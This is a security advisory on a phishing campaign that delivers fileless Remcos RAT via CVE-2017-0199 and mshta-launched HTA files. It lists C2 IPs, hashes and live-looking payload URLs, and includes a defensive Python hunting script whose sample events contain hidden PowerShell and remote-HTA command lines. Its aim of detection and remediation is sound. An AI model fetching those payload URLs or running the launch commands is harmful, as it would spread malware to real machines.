November 11, 2024
Severity
High
Analysis Summary
Researchers have uncovered a new phishing campaign that delivers a fileless variant of Remcos RAT, a well-known commercial malware. Remcos is sold as a remote administration tool that gives its buyers a range of capabilities for controlling machines remotely. Threat actors, however, have abused Remcos to steal private data from victims and take remote control of their computers in order to carry out further malicious activity.
The attack begins with a phishing email that uses purchase-order lures to entice the recipient into opening a Microsoft Excel attachment. The malicious Excel document exploits a known remote code execution vulnerability in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file from a remote server and launch it with mshta.exe.
To evade detection, the HTA file is wrapped in several layers of PowerShell, JavaScript and Visual Basic Script code. According to the researchers, its main job is to download and run an executable file from the same server. That executable then runs another obfuscated PowerShell program and applies a range of anti-analysis and anti-debugging measures to make detection harder. Finally, the malicious code uses process hollowing to download and execute Remcos RAT: Remcos is loaded into the memory of a legitimate running process rather than being written to disk, which is what makes this a fileless variant.
Remcos RAT executes commands received from the attacker's command-and-control (C2) server and can collect a wide range of data from the compromised host, including system metadata. Through these commands the malware can harvest files, list and terminate processes, manage system services, modify the Windows Registry, run commands and scripts, capture screenshots, change the victim's desktop wallpaper, activate the camera and microphone, download additional payloads, record the screen, and even disable keyboard and mouse input.
Impact
- Unauthorized Access
- Sensitive Data Theft
- Code Execution
- Security Bypass
- Cyber Espionage
Indicators of Compromise
IP
- 192.3.220.22
- 107.173.4.16
MD5
- 3763d0c03b5f6228ba0b06c464a0828d
- c443d03e485232a860b726fc83593004
- 450228d72f9f726b645c55bbbc6db905
- 552ed0904239d64db1895620b38dc799
- 14c1d52f24f29389597b36dcfc90b95a
- 3aaf33e220a7bbed189a27a797e1b351
SHA-256
- 4a670e3d4b8481ced88c74458fec448a0fe40064ab2b1b00a289ab504015e944
- f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661
- 9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
- d4d98fdbe306d61986bed62340744554e0a288c5a804ed5c924f66885cbf3514
- f9b744d0223efe3c01c94d526881a95523c2f5e457f03774dd1d661944e60852
- 24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d
SHA-1
- d6209f26483f566417ec4adedcc9f54c56862d35
- 6b556d04962638694402d15b7fa24b6bd6b1d1f4
- b26075c51a4681f2ff7407188f5e9480545a7aca
- 8a6a6c6efd31b04c716cde1783b45783f2843e20
- a2578253f17b5f0ef989965dcb74aebb60763b2d
- 8699ef56f096082c5c97cf9e9611d5aec58e7a86
URL
- https://og1.in/2Rxzb3
- http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
- http://192.3.220.22/hFXELFSwRHRwqbE214.bin
- http://192.3.220.22/430/dllhost.exe
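As an added example (not part of the advisory or the researchers' tooling), the following Python script hunts for both the execution chain described in the Analysis Summary (Office spawning mshta.exe, mshta.exe pulling a remote HTA, mshta.exe spawning a script host) and the indicators listed above, over process, network and file telemetry. The key=value event format and the sample events are constructed for this example; the pairing of one listed SHA-256 with a dllhost.exe path, and the URL `http://192.3.220.22/new/path.hta`, are assumptions used to show the rules firing, not observations from the campaign. The rule `ioc_ip_in_url` deliberately goes beyond the listed URLs: it flags any URL whose host is one of the listed C2 addresses, so a new path on the same server is still caught.

```python
import re
from collections import namedtuple
from urllib.parse import urlparse

# Indicators copied from the advisory's IOC list.
IOC_IPS = {"192.3.220.22", "107.173.4.16"}
IOC_URLS = {
    "https://og1.in/2Rxzb3",
    "http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta",
    "http://192.3.220.22/hFXELFSwRHRwqbE214.bin",
    "http://192.3.220.22/430/dllhost.exe",
}
IOC_HASHES = set("""
3763d0c03b5f6228ba0b06c464a0828d c443d03e485232a860b726fc83593004
450228d72f9f726b645c55bbbc6db905 552ed0904239d64db1895620b38dc799
14c1d52f24f29389597b36dcfc90b95a 3aaf33e220a7bbed189a27a797e1b351
d6209f26483f566417ec4adedcc9f54c56862d35 6b556d04962638694402d15b7fa24b6bd6b1d1f4
b26075c51a4681f2ff7407188f5e9480545a7aca 8a6a6c6efd31b04c716cde1783b45783f2843e20
a2578253f17b5f0ef989965dcb74aebb60763b2d 8699ef56f096082c5c97cf9e9611d5aec58e7a86
4a670e3d4b8481ced88c74458fec448a0fe40064ab2b1b00a289ab504015e944
f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661
9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
d4d98fdbe306d61986bed62340744554e0a288c5a804ed5c924f66885cbf3514
f9b744d0223efe3c01c94d526881a95523c2f5e457f03774dd1d661944e60852
24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d
""".split())

# Behavioural rules for the delivery chain: Office -> mshta.exe -> script host.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"""https?://[^\s"']+""", re.I)
# Assumed export format: space-separated key=value pairs, values with spaces double-quoted.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

Finding = namedtuple("Finding", "host rule evidence")


def parse_event(line):
    """Turn one key=value log line into a dict (quoted or bare values)."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def check_process(ev):
    parent, image = ev.get("parent", "").lower(), ev.get("image", "").lower()
    cmd = ev.get("cmdline", "")
    if parent in OFFICE_APPS and image == "mshta.exe":
        yield "office_spawns_mshta"        # CVE-2017-0199 style HTA launch from a document
    if image == "mshta.exe" and URL_RE.search(cmd):
        yield "mshta_remote_hta"           # HTA fetched from a remote server
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        yield "mshta_spawns_script_host"   # the next obfuscation layer being executed
    for url in URL_RE.findall(cmd):
        if url in IOC_URLS:
            yield "ioc_url"
        elif urlparse(url).hostname in IOC_IPS:
            yield "ioc_ip_in_url"          # unknown path on a known C2 address


def check_network(ev):
    if ev.get("dst") in IOC_IPS:
        yield "ioc_ip"


def check_file(ev):
    if any(ev.get(algo, "").lower() in IOC_HASHES for algo in ("md5", "sha1", "sha256")):
        yield "ioc_hash"


CHECKS = {"process": check_process, "network": check_network, "file": check_file}


def hunt(lines):
    """Return one Finding per (event, rule) hit, in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        check = CHECKS.get(ev.get("type"))
        if check is None:
            continue
        evidence = ev.get("cmdline") or ev.get("dst") or ev.get("path", "")
        findings.extend(Finding(ev.get("host", "?"), rule, evidence) for rule in check(ev))
    return findings


# Constructed sample telemetry. The hash/path pairing and the /new/path.hta URL are
# assumptions for illustration, not observations from the campaign.
SAMPLE_EVENTS = [
    'type=process host=WS01 parent=EXCEL.EXE image=mshta.exe cmdline="mshta.exe http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta"',
    'type=process host=WS01 parent=mshta.exe image=powershell.exe cmdline="powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"',
    'type=network host=WS01 image=powershell.exe dst=192.3.220.22 dport=80',
    'type=file host=WS01 image=powershell.exe path="C:\\Users\\alice\\AppData\\Local\\Temp\\dllhost.exe" sha256=24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d',
    'type=process host=WS03 parent=WINWORD.EXE image=mshta.exe cmdline="mshta.exe http://192.3.220.22/new/path.hta"',
    # Benign noise: a locally installed HTA launched from Explorer, and ordinary browsing.
    'type=process host=WS02 parent=explorer.exe image=mshta.exe cmdline="mshta.exe C:\\Program Files\\Vendor\\setup.hta"',
    'type=network host=WS02 image=chrome.exe dst=93.184.216.34 dport=443',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.rule:26} {f.evidence}")
```

The behavioural rules are the ones worth keeping after the listed indicators go stale: the attacker can rotate IPs and recompile payloads cheaply, but an Office process launching mshta.exe against an http URL is rare in a managed fleet and is the step this chain cannot avoid.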
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Patch and upgrade platforms and software promptly and make this a standard security policy; in particular, ensure Microsoft Office installations are patched against CVE-2017-0199, which this campaign exploits.
- Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
- Implement network segmentation to limit lateral movement for attackers within the network.
- Implement advanced email filtering to detect and block phishing emails.
- Employ updated and robust endpoint protection solutions to detect and block malware.
- Develop and test an incident response plan to ensure a swift and effective response to security incidents.
- Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
- Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
- Regularly back up critical data and ensure that backup and recovery procedures are in place.